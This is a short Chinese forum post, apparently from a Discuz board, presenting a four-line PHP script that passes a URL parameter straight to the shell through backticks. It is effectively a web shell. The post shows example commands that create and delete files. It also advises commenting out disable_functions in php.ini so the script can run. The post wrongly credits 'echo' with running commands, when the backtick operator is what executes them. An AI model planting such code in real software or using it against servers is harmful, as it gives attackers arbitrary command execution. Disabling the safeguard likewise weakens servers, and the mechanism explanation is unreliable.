设为首页收藏本站淘宝杂货铺

从F到0 - From F to 0

 找回密码
 注册已关闭
搜索
查看: 1917|回复: 4
收起左侧

[PHP/ASP/JSP] 一段官网都没公布的不可能的PHP源码 echo 函数竟然可以这么用

[复制链接]
发表于 2018-1-26 19:05:42 | 显示全部楼层 |阅读模式
本帖最后由 Kuni7wa 于 2018-1-26 19:04 编辑


  1. <?php
  2. $r = $_GET['r'];
  3. echo `$r`; //请注意这不是单引号,而是ESC键下的一个符号
  4. ?>

复制代码

保存以后,访问 ?r=copy nul 111.txt 根目录出现了文件 111.txt
再次访问 ?r=del 111.txt 这个文件被删除,可执行任何cmd语句。
如果发现不能运行 打开文件 php.ini 查找 disable_functions = 注释后重启服务器即可。
发表于 2018-1-30 21:57:55 | 显示全部楼层
表示么见过
发表于 2019-4-10 07:10:30 来自手机 | 显示全部楼层
我知道是啥
您需要登录后才可以回帖 登录 | 注册已关闭

本版积分规则

QQ|手机版|Archiver|从F到0 ( 蒙ICP备17002595号-1 )
蒙公网安备15010402000325号

腾讯云安全认证

GMT+8, 2024-5-5 11:41 , Processed in 0.545031 second(s), 17 queries .

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表